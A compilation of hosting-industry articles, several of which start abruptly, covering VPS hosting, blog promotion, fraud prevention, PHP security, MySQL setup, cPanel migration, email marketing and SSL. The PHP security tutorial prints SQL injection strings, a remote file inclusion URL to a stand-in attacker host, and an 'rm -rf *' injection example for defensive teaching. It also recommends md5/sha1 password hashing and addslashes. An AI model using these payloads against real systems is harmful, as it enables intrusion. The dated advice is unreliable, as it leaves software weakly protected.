A virtual private server allows multiple customers to share the expense of hardware and network connections without sacrificing privacy, performance or preference. For this reason, VPS is considered one of the most sophisticated modes of automation available for provisioning small to mid-sized enterprise Web hosting.
The use of such technology allows hosting providers to save money by simulating the features of a dedicated server multiple times upon a single physical hosting environment, while concurrently allowing them to deliver high-quality Web services to their end users. VPS solutions allow Web hosting resellers to provide a full range of services usually only afforded by dedicated hosting technology. Resellers can therefore offer their clientele full administrative or “root” access to their Web services.
The virtual private server was first implemented by hosting giant NTT/Verio to bridge the gap between shared hosting environments and customized dedicated servers. By using a virtual private server, Web hosting resellers and Web designers can provide small businesses the performance, security, and control of dedicated hosting services at a fraction of the cost.
A virtual private server eliminates the restrictions of virtual hosting by providing all of the administrative features of a dedicated server. Each VPS user therefore receives their own set of services that they can customize to their specific needs. Virtual hosting is limited in comparison because its users do not have root access and software configurations cannot be customized, despite the fact that physical resources are also multiplexed. A virtual private server on the other hand, contains its own unique file system and CGI-BIN, disk space, system resources, bandwidth and memory allotments, which allow for a high level of customization.
Due to the fact that a VPS solution truly simulates a dedicated server, some technical understanding of server administration is required. Any true VPS solution will provide users with: “root” or full administrative access; guarantee a specific allocation of server resources, including CPU, memory and bandwidth; and allow the user to manage multiple servers and file areas through a sophisticated control panel.
A virtual private server will ensure “performance isolation” so that heavy traffic or CPU loads will not affect other VPS solutions on the same infrastructure. Other major features that characterize VPS solutions include: “fault tolerance,” which ensures that errors that affect one specific private server do not affect others; and “enhanced security,” which ensures that e-business applications can be deployed with greater privacy.
The most popular feature that VPS customers use, however, is the virtual private server’s capacity for “functional isolation.” Because a VPS has its own contained services, it is possible for users to install and customize their own open-source and commercial software packages.
Many virtual private servers on the Unix platform have become so advanced that they even permit users to install Linux RPM packages. This allows users to take source code for new software and package it into source and binary form, such that binaries can be easily installed and tracked, and source can be easily rebuilt. The use of RPM packages also allows VPS users to maintain a database of all packages and their files that can be used for verifying packages and querying for information about files and/or packages.
Small businesses that run their own e-commerce Web sites also appreciate the functional isolation of their private server, because it allows them to obtain their own secure certificates and shopping cart software for their e-business operations. Many sophisticated VPS solutions will even offer third-party plug-ins or modules, allowing users to take advantage of control panel functionality in order to install everything from the simplest CGI scripts to the most advanced shopping carts.
Due to these advantages, virtual private servers are very popular and are a relatively inexpensive choice for small to mid-sized enterprises seeking to maintain their own Web presence. VPS solutions are the natural choice for SMEs and individuals wishing to upgrade a shared or virtual hosting package. The following are descriptions of popular VPS packages now available through an assortment of major Web host vendors:
Ensim
Ensim’s award-winning product line includes control panels, virtual private servers, server management, as well as Microsoft Exchange hosting software.
H-Sphere
H-Sphere is scalable, multi-server, centralized hosting automation software with fully brandable reseller support, comprehensive recurrent billing, a trouble ticket system and complete account provisioning with automated signup. It supports Win2000, Linux and FreeBSD. It provides a fully featured, easy-to-use, Web-based end-user control panel and a powerful admin user interface.
SW-soft
SW-soft develops the Virtuozzo technology and the HSPcomplete hosting automation solution. SWsoft’s products deliver powerful, comprehensive solutions that power data center management and provide excellent return on investment.
Sphera
Sphera is a leading developer of Web hosting automation and management software for Internet data centers, ISPs and hosting providers. Sphera’s HostingDirector enables cost-cutting and revenue increases by automating Web hosting management, facilitating sales of value added applications, services and more.
The hosting software firms above develop popular and dependable VPS packages. Consider using a hosting firm that elects to use one of these virtual private server systems.
One such tool is RSS, or Really Simple Syndication. It’s a family of Web feed formats used to publish frequently updated content such as blog entries, news headlines or podcasts. RSS makes it possible for people to keep up with a Web site in an automated manner that’s easier than manually logging in to check for updates. An easy way to get working with RSS is Feedburner (feedburner.com), which enables bloggers to easily create RSS feeds that will syndicate content to readers through feed aggregators. Users can check subscribed feeds regularly for new content and automatically download updates. An easy way to get people to subscribe to your blog’s RSS feed is adding the iconic RSS button to your blog’s layout.
Another button that, when added to your layout, can help your blog’s popularity is Technorati’s Favorites Feature (technorati.com), which enables readers to list and track up to 50 of their favorite blogs, and lists new posts from the blogs on the list, as they are updated.
Digg (digg.com) is a popular social ranking site that enables readers to submit content and raise the popularity of a blog post, news article or video post by voting or “digging” the posts they like best. As a blogger, you can make your Web site easily “diggable” by adding a Digg link to your layout.
Social bookmarking site del.icio.us (del.icio.us) also enables readers to bookmark blogs or specific posts and share them as favorites with friends and the del.icio.us community. The primary use of del.icio.us is the storing of bookmarks online, which enables users to access and manage their bookmarks from any computer.
Having your blog listed among somebody’s del.icio.us favourites is advantageous because it makes it possible for other users in that community to come across it. Once again, you can simplify the process for readers by adding a del.icio.us link on the main page of your blog or on every page there is content.
Another Web site that works similarly in terms of making your blog easy to find is StumbleUpon (stumbleupon.com). This Web site is similar to del.icio.us in the sense that people can add your Web site to the StumbleUpon database. There they can rate it as thumbs up or thumbs down.
Once the Web site or blog post is in the database, other Stumblers will be able to, well, stumble upon it and add their rating. StumbleUpon uses ratings to form collaborative opinions on Web site quality. Users only see pages that friends and like-minded stumblers have recommended. This helps users discover great content they probably wouldn’t have found using a search engine.
One of the simplest ways to prevent fraud is to address the matter on your Web site. By placing fraud notices, buttons and images on your site and order forms, you can deter some potential online scammers simply out of fear. Explain that violators will be pursued to the fullest extent of the law and that they can be tracked by their IP and email addresses.
Second, carefully review your orders. Make sure the consumer filled out all the information correctly and that it matches the information that the card-issuing bank has on file. This isn’t always the best judge of a fraudulent order as sometimes the billing address will differ from the shipping address if your product is being sent as a gift. But use extra precaution when the information doesn’t match up. One way to clear up any confusion is by actually calling or emailing your customer before you process the order.
You should also be cautious when dealing with orders from outside the US, especially if you’re a small to medium-sized business operating in the US; you are prohibited from doing business with countries that are subject to US Embargo. Reports show that a majority of fraudulent orders originate from countries in Asia, Africa and the Middle East. More detailed lists are available from resources like the American Registry for Internet Numbers (arin.net) or Asia Pacific Network Information Centre (apnic.org). Experts say that many fraudsters also use free email addresses because they make it easier to hide an identity. Take the time to check online databases that list all the different free email providers. A good source is EmailAddresses.com (emailaddresses.com).
Using fraud prevention software provides a more automated way to protect your orders from fraud.
VariLogiX (varilogix.com) offers a product called FraudCall, an automated telephone service that verifies product orders. The tool places outbound telephone calls to customers to verify their orders while they are still on a merchant’s Web site placing the order, so there is no delay with verification. A basic account starts at $9.99 a month.
Another option is FraudGuardian (fraudguardian.com), which lets you integrate real-time fraud scoring into your own order form or e-commerce software. With each fraud score calculated by FraudGuardian, the score and location are saved for statistical purposes. These enable the software provider to show “fraud hot spots” or “fraud clusters” by domain and by country. The company says it can help protect businesses from chargebacks by using the fraud score to weed out fraudulent orders before they come back to hurt the bottom line. Customers can choose from eight packages starting at $5.95 a month.
Keep in mind that using more than one precautionary measure will increase your chances of protecting yourself from e-commerce fraud. And you should constantly update your prevention processes to keep your business as safe as possible.
PHP is a popular server-side scripting language for serving dynamic pages. It’s simple to code and debug and has good support for databases like MySQL, MSSQL and Oracle. Insecure PHP code, however, is very simple to hack.
This article explains a few such vulnerabilities, so that you can avoid them in your scripts. I will also explain methods to tweak the PHP config file (php.ini) for maximum security.
PHP run with Nobody Permission
Problem:
On cPanel servers, PHP runs as the ‘nobody’ user. This can become a major security issue if the permission you have given a file is 777, because that allows the ‘nobody’ user to edit the file and execute it. So always keep an eye on the permissions of your files.
Solution:
Always set the PHP script permission to 755 so that others cannot edit or change it. Enable PHPsuexec on the server. PHPsuexec will not allow PHP scripts with 777 permissions to run, and users cannot read another user’s files. On PHPsuexec-enabled servers, it’s common to find out the source of spamming from PHP scripts that use the mail() function. So on shared servers, always enable PHPsuexec for maximum security.
Issues with global variables
Problem:
Using register_globals makes your coding easier. With register_globals=ON you can pass values to another PHP page. But setting register_globals=ON can make your scripts vulnerable. Since PHP does not require variables to be initialized, users can assign any values to them through register_globals. With a creative mind, anyone can access the protected area of the code. Here is an example.
Consider this as password.php:
if ($KEY == "XXXX") { $check = 1; }
if ($check == 1) {
    // YOUR CODE GOES HERE (admin area)
}
You can pass the value as “password.php?check=1”, and this will let you into the “admin area” whether you entered the correct KEY or not.
Solution:
One way is to disable register_globals, but this will make your coding more difficult. Otherwise, make sure that you have initialized the variables. In this case, initialize $check = 0. You can enable register_globals on your server, but always keep in mind the security issues with it.
Problems with functions like exec() , system() and backticks
Problem:
Functions like exec() and system() are used for executing external programs, so they can execute shell commands as well. If you pass a user input value to the exec() function, the results can be very bad. If you call system($input_from_user), the user can enter any command as input and execute it on your machine. He can even delete all the contents just by giving “rm -rf *”. Also, with the exec() function the user can enter any command just by using a semicolon (;) in the argument section.
Solution:
Disable insecure functions using disable_functions in php.ini.
You can use it like this:
disable_functions = system,exec
You can also use EscapeShellCmd() before passing the value to the system() or exec() functions. It escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands.
EscapeShellArg() can also be used for the same purpose. It puts single quotes around the string and escapes any existing single quotes in the string.
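What the two escaping functions above actually hand to the shell, as an added example that is not from the original article. It assumes a Unix-like host where exec() is enabled and the shell provides printf; the run() helper, the SHOW_ARGS constant and the inputs are constructed for illustration.

```php
<?php
// Added example, not from the original article. Assumes a Unix-like host where
// exec() is enabled and the shell has printf; names are illustrative.

// Run a command line and return the lines it printed.
function run(string $command): array
{
    $lines = [];
    exec($command, $lines);
    return $lines;
}

// printf '[%s]\n' prints every argument it receives on its own bracketed line,
// so the output shows exactly how the shell split the user input.
const SHOW_ARGS = "printf '[%s]\\n' ";

// Constructed inputs: the ";" trick from the text, an embedded single quote,
// and an extra option smuggled in after a space.
$inputs = [
    'report.txt; echo INJECTED',
    "it's mine; echo INJECTED",
    'report.txt --extra-option',
];

foreach ($inputs as $input) {
    // The raw concatenation SHOW_ARGS . $input is never executed here: the
    // shell would run whatever follows the ";" as a second command.

    // escapeshellcmd() backslash-escapes metacharacters such as ";" but leaves
    // spaces alone, so the input can still add arguments of its own.
    $cmdEscaped = SHOW_ARGS . escapeshellcmd($input);

    // escapeshellarg() wraps the input in single quotes and escapes embedded
    // quotes, so the program receives it as exactly one argument.
    $argEscaped = SHOW_ARGS . escapeshellarg($input);

    echo "input:          $input\n";
    echo "escapeshellcmd: $cmdEscaped\n";
    echo "  arguments:    " . implode(' ', run($cmdEscaped)) . "\n";
    echo "escapeshellarg: $argEscaped\n";
    echo "  arguments:    " . implode(' ', run($argEscaped)) . "\n\n";
}
```

With escapeshellcmd() the input is still split into several arguments, while escapeshellarg() always yields a single bracketed argument, which is why it is the one to use for a value that fills one argument slot.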
Including Files
You can include a PHP script in another PHP page with ‘include’.
But if the page path is passed as a variable, you may get into trouble. The user can include a remote file which may contain malicious scripts. The hacker can also include other local files.
If our PHP page include.php is like
$page = $_GET['path'];
include $page;
Then “include.php?path=http://hackingsite.com/hacking.php” will include the remote file hacking.php, so that the hacker can execute the hacking.php script on your server.
Solution:
You can disable the inclusion of remote files by editing the value of allow_url_fopen. Set this to OFF in php.ini. Also set open_basedir correctly in php.ini. Using open_basedir will restrict file inclusion to the defined directory. Also check the file name with a ‘switch’ or ‘if’ to make sure that it is an allowed one.
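One way to implement the "allowed file name" check described above, as an added example that is not from the original article. The page names, the resolve_page() function and the temporary pages directory are assumptions, created by the script itself so that it runs stand-alone.

```php
<?php
// Added example, not from the original article. The page names and the
// temporary directory are constructed so the script runs stand-alone.

// Create a throwaway pages directory with two page scripts.
$pageDir = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($pageDir);
file_put_contents("$pageDir/home.php", '<?php echo "home page\n";');
file_put_contents("$pageDir/contact.php", '<?php echo "contact page\n";');

// Allowlist: request value => fixed file name. The request value itself is
// only ever used as an array key, never as part of a path.
$allowed = ['home' => 'home.php', 'contact' => 'contact.php'];

function resolve_page($requested, array $allowed, string $baseDir): ?string
{
    // URLs, "../" paths, arrays (?path[]=x) and unknown names all stop here.
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;
    }
    // Defence in depth, mirroring open_basedir: the file must exist and its
    // real path must sit inside the pages directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $allowed[$requested]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed request values, including the remote URL from the text.
$requests = [
    'contact',
    'http://hackingsite.com/hacking.php',
    '../../../../etc/passwd',
    'home.php',
    ['home'],
];

foreach ($requests as $requested) {
    $file = resolve_page($requested, $allowed, $pageDir);
    echo json_encode($requested, JSON_UNESCAPED_SLASHES), ' => ';
    if ($file === null) {
        echo "rejected\n";   // a web page would send a 404 here
    } else {
        include $file;       // only allowlisted files inside $pageDir reach include
    }
}

// Remove the demo files.
unlink("$pageDir/home.php");
unlink("$pageDir/contact.php");
rmdir($pageDir);
```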
SQL Injection Attacks
Problem:
PHP is well packaged for use with MySQL. But using some simple techniques, others can hack into your database. If your script is not secured well, users can execute any SQL commands.
Let me explain with an example.
$user = $_POST['username'];
$pass = $_POST['password'];
$result = mysql_query("SELECT AcctNo FROM Users WHERE Username = '".$user."' and Password = '".$pass."'");
Consider that one user has entered a username as
' OR 1=1 #
and password as XXXX
Then our query will be
SELECT AcctNo FROM Users WHERE Username = '' OR 1=1 #' and Password = 'XXXX'
MySQL considers everything after the ‘#’ as a comment, so it will ignore it. So with the remaining query it will always select all the account numbers and return them. The user can thus get the account numbers even though he does not have a correct username and password.
Also, giving the password as some_value' OR 'X'='X will bypass this query.
Solution:
The problem here comes from the ' (single quotes) entered by the user. We have two ways to neutralize them. The first is the function addslashes(). It adds a \ (backslash) before all ' (quotes), so they have no effect. So before executing the query, you should pass the input through the addslashes() function. That is, it should be like
$user = addslashes($_POST['username']);
$pass = addslashes($_POST['password']);
Another option is using magic_quotes_gpc. You can set its value to ‘On’ in php.ini. If it is On, it will add a backslash before all single quotes and double quotes in strings coming from an HTML form, so they are escaped.
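One way to close the hole shown above, as an added example that is not the article's code: it goes beyond addslashes() by sending the user input as bound parameters through PDO and by checking passwords with password_verify(). The in-memory SQLite database (which needs the pdo_sqlite extension), the table rows and the find_account() name are assumptions made so the script runs offline.

```php
<?php
// Added example, not from the original article. Needs PHP 7.1 or later with
// pdo_sqlite; an in-memory SQLite database stands in for MySQL and the table
// contents are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE Users (
    AcctNo INTEGER PRIMARY KEY,
    Username TEXT UNIQUE,
    PasswordHash TEXT
)');

$insert = $db->prepare('INSERT INTO Users (AcctNo, Username, PasswordHash) VALUES (?, ?, ?)');
$insert->execute([1001, 'alice', password_hash('correct horse', PASSWORD_DEFAULT)]);
$insert->execute([1002, 'bob', password_hash('battery staple', PASSWORD_DEFAULT)]);

// Returns the account number for a valid login, null otherwise.
function find_account(PDO $db, string $user, string $pass): ?int
{
    // The statement text is fixed. The user input travels separately as data,
    // so quotes and "#" inside it can never change the query's structure.
    $stmt = $db->prepare('SELECT AcctNo, PasswordHash FROM Users WHERE Username = :user');
    $stmt->execute([':user' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The password is never placed in SQL at all; it is checked in PHP
    // against the stored hash.
    if ($row === false || !password_verify($pass, $row['PasswordHash'])) {
        return null;
    }
    return (int) $row['AcctNo'];
}

// Constructed login attempts, including the two inputs from the text.
$attempts = [
    ['alice', 'correct horse'],          // valid login
    ["' OR 1=1 #", 'XXXX'],              // username input from the text
    ['alice', "some_value' OR 'X'='X"],  // password input from the text
    ['bob', 'correct horse'],            // right password, wrong account
];

foreach ($attempts as [$user, $pass]) {
    $acct = find_account($db, $user, $pass);
    echo str_pad($user, 12), ' => ', $acct === null ? 'login refused' : "account $acct", "\n";
}
```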
Up to now I have described some of the common mistakes that can creep into your PHP scripts. Next I am going to explain some of the security measures that you should take to secure your PHP.
Configure your php.ini
php.ini is the configuration file of PHP. It has a number of variables. You can set the values of these variables to make your PHP scripts more secure. Here I am explaining some of them.
1) display_errors
Disabling display_errors is the first thing to do. If it is ‘On’, errors during execution will be displayed in the user’s browser window, so the user can get an idea of the table structure and directory structure. You can avoid this by disabling display_errors in php.ini.
Usage: display_errors=OFF
2) safe_mode
safe_mode is more relevant in a shared server environment. If safe_mode is enabled, PHP performs a UID/GID check on the file or directory to be accessed and compares it to the UID/GID of the script that is trying to access the file. If they are the same, it allows the file access; if not, it blocks the access. If you want to compare only the GID, you can enable the “safe_mode_gid” value in php.ini.
3) sql.safe_mode
Set sql.safe_mode to Off. If it is On, mysqli_connect() and mysql_connect() will connect to MySQL with the default username and password.
4) magic_quotes_gpc
Enable magic_quotes_gpc so that you can make your user inputs secure. It works the same as the addslashes() function. It adds a backslash (\) before every single quote and double quote.
5) safe_mode_allowed_env_vars and safe_mode_protected_env_vars
These two variables protect environment variables from being changed by users’ PHP scripts. The field safe_mode_allowed_env_vars contains a list of prefixes that identify the names of the environment variables the user is allowed to change. Environment variables that do not start with one of the prefixes defined in safe_mode_allowed_env_vars cannot be modified.
The other setting, safe_mode_protected_env_vars, sets the names of environment variables that the user is not allowed to modify even if they match safe_mode_allowed_env_vars.
6) disable_functions
This allows you to disable insecure functions such as shell_exec, system and exec.
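A small audit script for the settings listed above, as an added example that is not from the original article. The function names are assumptions, and the expected values are taken from the recommendations in the text; a directive that the running PHP build does not know is reported as such rather than guessed at.

```php
<?php
// Added example, not from the original article. Reports how the running PHP
// build is configured for the directives discussed above.

// Interpret an ini value as a boolean; null means this PHP build does not
// know the directive at all (ini_get() returned false).
function ini_flag(string $name): ?bool
{
    $raw = ini_get($name);
    if ($raw === false) {
        return null;
    }
    return !in_array(strtolower(trim($raw)), ['', '0', 'off', 'false', 'no', 'none'], true);
}

// Directive => value the article recommends (true = On, false = Off).
$recommended = [
    'display_errors'   => false,
    'allow_url_fopen'  => false,
    'register_globals' => false,
    'sql.safe_mode'    => false,
    'magic_quotes_gpc' => true,
];

function audit(array $recommended): array
{
    $findings = [];
    foreach ($recommended as $name => $want) {
        $have = ini_flag($name);
        if ($have === null) {
            $findings[] = "$name: not known to this PHP build";
        } elseif ($have !== $want) {
            $findings[] = "$name: is " . ($have ? 'On' : 'Off')
                . ', article recommends ' . ($want ? 'On' : 'Off');
        }
    }

    // An empty open_basedir means scripts may open files anywhere they can read.
    if (trim((string) ini_get('open_basedir')) === '') {
        $findings[] = 'open_basedir: not set';
    }

    // Functions the article lists for disable_functions.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    foreach (['system', 'exec', 'shell_exec'] as $fn) {
        if (!in_array($fn, $disabled, true)) {
            $findings[] = "disable_functions: $fn() is still enabled";
        }
    }
    return $findings;
}

$findings = audit($recommended);
echo $findings ? implode("\n", $findings) . "\n" : "All checked directives match.\n";
```

Run it through the same SAPI that serves the site, since command-line PHP often loads a different php.ini than the web server does.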
Take your own logical measures
Besides all these, you can take your own security measures while writing PHP scripts. For example, always store your passwords as hashed values. PHP has built-in hashing functions named md5() and sha1(). md5() is a 128-bit and sha1() a 160-bit hashing algorithm. If you use these hashing techniques, you can protect your passwords and important data from hackers even if your databases are compromised.
Always test your code with different types of input and search for any security flaws. Keep in mind that every user input to your PHP scripts can be malicious. We cannot make our scripts perfect, but always try for that.
Happy Coding……
Sometimes we may need to run multiple versions of MySQL on the same server. This can happen if you either need to test a new MySQL release or you need a new MySQL version and you don’t want to make any changes to the existing system.
The whole idea behind this is to compile the new MySQL server with different TCP/IP ports and Unix socket files so that each one is listening on different network interfaces. Compiling in different base directories for each installation also results in separate compiled-in data directory, log file, and PID file location for each server.
First download the source tar file from mysql.com.
$> tar xfz mysql.tar.gz
$> cd mysql.XX
Important:
“/etc/my.cnf” is the default file that is used by a MySQL server. When the new version is tested, it will load the default configuration in /etc/my.cnf.
To resolve this I replaced every instance of “cnf” inside the source folder with “conf” by using the following command.
find ./ -type f | xargs perl -pi -w -e 's/cnf/conf/g;'
1) The default user generally is “mysql”. Add another user and group for example mysqlt for the new version of MySQL.
2) A typical ./configure command…
./configure --prefix=/usr/local/mysql --enable-local-infile \
--with-tcp-port=4444 --with-mysqld-user=mysqlt \
--with-base_dir=/usr/local/mysql --with-log=/usr/local/mysql/mysqld.log \
--with-pid_file=/usr/local/mysql/mysqld.pid \
--with-unix-socket-path=/tmp/mysqlt.sock --localstatedir=/var/lib/mysqlt
The new values you will use for your new MySQL server are:
Port number : 4444
mysql user : mysqlt
base_dir : /usr/local/mysql
data directory : /var/lib/mysqlt
log file : /usr/local/mysql/mysqld.log
3) Compile and Install
make && make install
4) Create your new MySQL config file.
cp support-files/my-medium.conf /etc/my.conf
cd /usr/local/mysql
bin/mysql_install_db --user=mysqlt   # this will install all the needed databases
bin/mysqld_safe --user=mysqlt &
TO SET A PASSWORD FOR THE MySQL root USER
/usr/local/mysql/bin/mysqladmin -u root -h hostname password 'new-password'
/usr/local/mysql/bin/mysqladmin -u root password 'new-password'
5) To start the service
cd /usr/local/mysql
./share/mysql/mysql.server start
6) To test
#telnet localhost 4444
and you should see this
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+ 4.0.26-logIE^*THL
And you are done. You can copy mysql.server >> rc.d to start it when the server is rebooted.
With these steps, you can download and configure different mysql versions to use different values for port, datadirectory, mysql user, configuration file etc….
Warning: You should never have two servers that update data in the same databases.
Moving all the accounts between two servers that host the same control panel is usually not a very difficult process.
But like G.B. Shaw said,
“If you have an apple and I have an apple and we exchange these apples then you and I will still each have one apple. But if you have an idea and I have an idea and we exchange these ideas, then each of us will have two ideas”
This article is a different but successful way of migrating entire servers between two cpanel servers.
Scenario:
You need to move all domains from the present server to the new server. At the same time, you need the whole move done perfectly and with zero downtime for all domains. In addition, you need to move even your nameservers between two different datacenters. It’s pretty complicated.
Migration implementation
1. The nameservers’ and the domains’ TTL (Time To Live) needs to be reduced to, say, between 30 minutes and 1 hour. This change has to be made at least one week before the IP changes, as it needs time to propagate to the various ISPs all around the world. This ensures that the fresh zone files are loaded all around the world faster and that clients access the old server for a shorter duration.
2. Accounts need to be moved to the new server. All information up to just prior to the client’s IP changes should not be lost, and hence “rsync” is needed just prior to the move.
3. The changeover should have minimum impact in terms of site accesses becoming slow or mails being lost.
4. The new server needs to be set up and properly configured prior to the move, and all necessary software needs to be installed.
5. A study of the top 10 domains that use the most software/resources on the server needs to be done. This way, once the move is done, they are checked first to ensure everything is working like on the old server.
Nameserver TTL
Login to the cpanel WHM,
http://oldserver.com:2086
Username : root
Password : “your password”
Then Go to the following link
Main --> Server Configuration --> Basic cPanel/WHM Setup
Set Domain Time to Live & Nameserver Time to Live to 3600 seconds and save changes.
Moving Accounts
Login to the WHM of the new server and go to
Main --> Transfers --> Copy multiple accounts from another server
Enter the old server’s IP address, enter the password and click on “grab account list”
This will give you a list of all the accounts on the old server. Select the accounts you need copied over and once completed, initiate the transfer.
Once this transfer is completed, (it may take anywhere between 2-12 hours depending on connection speeds, server utilization, size of accounts being moved) only then should you close the window. Any connection breakup would mean you would need to terminate the copy on the new server and reinitiate the transfer again from the one where the connection broke.
You will get a status report on all account moves that were successful. Accounts that have a “-” in their username are not accepted in the new cPanel taxonomy, so you would need to manually make changes and copy those accounts over to the new server.
Rsync
Once the account moves are done, we need to ensure that the accounts stay synchronized and no data is lost until the IP and nameserver changes that direct accesses to the accounts on the new server are done.
To rsync, follow these steps:
a) Setup ssh-key
b) rsync the folders /home, /var/cpanel, /var/lib/mysql, /usr/local/cpanel/3rdparty/mailman, /usr/local/cpanel/base/frontend, /etc/valiases, /etc/vdomainaliases, /etc/vfilters using the commands
for user in `cat /home/tomove`; do rsync -avuz -e ssh root@OLDSERVERIP:/home/$user/ /home/$user; done
# The trailing slash on each source copies the directory's contents into the destination instead of nesting a second copy inside it
rsync -avuz -e ssh root@OLDserverIP:/var/cpanel/ /var/cpanel
rsync -avuz -e ssh root@OLDserverIP:/var/lib/mysql/ /var/lib/mysql
rsync -avuz -e ssh root@OLDserverIP:/usr/local/cpanel/3rdparty/mailman/ /usr/local/cpanel/3rdparty/mailman
rsync -avuz -e ssh root@OLDserverIP:/usr/local/cpanel/base/frontend/ /usr/local/cpanel/base/frontend
rsync -avuz -e ssh root@OLDserverIP:/etc/valiases/ /etc/valiases
rsync -avuz -e ssh root@OLDserverIP:/etc/vdomainaliases/ /etc/vdomainaliases
rsync -avuz -e ssh root@OLDserverIP:/etc/vfilters/ /etc/vfilters
Fixing Databases
Once rsync is completed, you need to repair the MySQL databases since they get corrupted.
By running /scripts/fixmysql on the new server and verifying that the databases show as OK, you can ensure that there is no corruption in the databases. Just run the following commands after going to /var/lib/mysql on the new server:
/scripts/fixmysql;/usr/bin/mysql_fix_privilege_tables;/usr/bin/mysqlcheck -A --auto-repair;myisamchk -r -e ./*
Setting up Cron
You can set up the Cron scheduler to repeat the rsync every couple of hours until the IPs on the old server are changed to those of the new server. This ensures minimum loss of data.
Changing IP on the OLD Server
Initially, when you move accounts to the new server, you need to ensure they all use the same shared IP, and you need to keep a list of the accounts that need a unique IP. Once the account moves are completed, do the following steps on the old server:
Change the IP in the zone files of the DNS on the old server to that of the new server.
cd /var/named
perl -pi.bak -e “s/[oldip]/[newip]/g” *.db
Next, do these steps:
mv /etc/secondarymx /etc/secondarymx.orig
mv /etc/localdomains /etc/secondarymx
mv /etc/secondarymx.orig /etc/localdomains
This ensures that mails sent locally within the server as well as using forms, also go to the new server instead of being sent to the local mailboxes.
In 24 hours’ time, if everything is working fine and the accesses are moving to the new server, set the TTL and nameserver TTL on the new server to 14400 and you can shut down the old server. You can also change the IPs of dedicated IP clients to unique IPs and everything should work fine.
Companies like Ning.com (ning.com) and GoingOn (goingon.com) enable businesses to sign up and create social networks they can customize and brand as their own.
Ning.com says businesses can be up and running within minutes, with multiple administrators, custom member profile questions, tools for uploading photos, videos and music, blogging tools and widget add-ons. A basic Ning.com social networking site is free and comes with 5 GB of storage and 100 GB of bandwidth. However, businesses can enhance their sites by running ads for $19.95 per month, using their own domain names for $4.95 per month and increasing their capacity for $9.95 each month for each additional 5 GB of storage and 100 GB of bandwidth.
GoingOn similarly allows multiple administrators, corporate branding and music, video and photo sharing, but differentiates itself with “networked blogging,” which lets businesses aggregate people around shared interests, solicit feedback and opinion and capture knowledge. Signup is free.
Other companies offer single-license software that businesses can host themselves or through a recommended hosting provider. Alstrasoft.com (alstrasoft.com/efriends.htm) offers a social networking package called E-friends for $280 per year with features including blogs, forums, text-based chat and event planning. Administrators can use the integrated banner ads system to earn extra income by publishing paid banner ads on their E-Friends sites. Alstrasoft says customers can either host the software on their own servers, or sign up with its recommended hosting provider Ubiquity Web Hosting (ubiquityhosting.com) and receive a $100 discount for the E-friends script.
Another software option is Web Scribble Solutions’ webNetwork (webscribble.com/products/webnetwork/index.shtml) that businesses can purchase for $199. Web Scribble also offers Web hosting services for customers, starting at $9.99 for 500 MB of space, 50 GB of bandwidth and one MySQL database.
If you prefer to purchase software and install it on a local computer, Email Marketing Director by Arial Software (arialsoftware.com/emailmarketingdirector.htm) is a good option. The software works with most Windows operating systems, functions even on a dial-up connection and enables non-technical individuals to create and deliver personalized email marketing campaigns. It also has a built-in database supporting an unlimited number of lists, pre-made email newsletter templates, automatic bounce and unsubscribe handling and simple email personalization.
When installing the software on your own infrastructure, it’s important to be aware of the kind of restrictions your ISP may have on bulk email sending, whether it’s a size limit, batch size limit or complete ban on sending bulk messages. Businesses can purchase Email Marketing Director for $495 and maintain a support plan for $149 per year.
A popular alternative to installing software is to sign up with email newsletter software providers who host your email campaigns and database on their servers. iContact (icontact.com) is an on-demand email marketing service that enables users to create, send and track email newsletters, RSS feeds, surveys and autoresponders. It includes open and clickthrough tracking, a WYSIWYG newsletter editor, CAN-SPAM compliance and over 300 templates to choose from. With iContact, users pay a monthly fee based on the number of subscribers. Plans start at $9.95 per month or $107.46 per year for 500 contacts and under, and users can send up to six times their subscriber limit per month.
Another company that offers email newsletter marketing services is Vertical Response (verticalresponse.com). Not unlike iContact, it enables users to send out messages with customized newsletters or one of the templates, utilize free opt-in forms that turn Web site visitors into actual email leads and offers free data hosting with unlimited list uploads at no charge. One big difference is rather than paying a monthly fee, users can either pay as they go on a per campaign basis or buy in bulk and subtract from a total amount of credits every time they email. To send up to 1,000 emails, it costs $0.015 per email or $15.00 per 1,000 emails and the cost decreases with the larger number of emails you send.
Whatever software you decide to go with, email newsletter software will help drive Web sites sales, qualified leads, retail store visits, ticket sales or increase readership of your content. You just have to decide on whether you want it installed on your own machines or sign up with a email marketing service provider and let them host your content.
Secure Sockets Layer is a global standard security technology, developed by Netscape in 1994, that creates an encrypted link between a Web server (your Web site) and a Web browser (the potential customer) to ensure that all data transmitted remains private and secure. SSL technology makes it easier for customers to trust you by displaying a certificate authority’s badge of certification on your site or the “golden padlock,” which appears in a user’s browser to indicate they are viewing a secure Web page.
An SSL certificate has become an important badge of trust for any online retailer, providing assurance to your customers that their data cannot be tampered with or forged and ensuring that your customers’ sensitive data is transmitted securely.
Besides purchasing a basic SSL certificate capable of 128-bit encryption, many certificate authorities now offer an Extended Validation SSL certificate option as well. To issue an SSL certificate that complies with the standard, a certificate authority must adopt the extended certificate validation practice and pass an audit. When shoppers visit a Web site secured with an EV SSL certificate, new high-security browsers, such as Internet Explorer 7, trigger the address bar to turn green and display the name of the organization listed in the certificate as well as the certificate authority.
There are many certificate providers that offer both SSL and EV SSL certificates, one of which is GeoTrust (geotrust.com), owned by VeriSign. The company offers a basic SSL certificate package, QuickSSL, for $249 per year as well as a higher assurance option with its True BusinessID with EV package, which comes with up to 256-bit encryption, the GeoTrust True site seal and triggers the green bar in high-security Web browsers. This package starts at $899 per year.
Comodo (comodo.com) also offers standard SSL and EV SSL certificate options. For $79.95 per year, businesses can purchase an Essential SSL certificate, which ensures that information is kept private while being transmitted, verifies the control and registration of a Web site’s domain and businesses get a golden padlock and are ready to sell online within minutes of purchasing. Comodo’s EV SSL certificates work with the latest releases of major browsers and start at $849 per year.
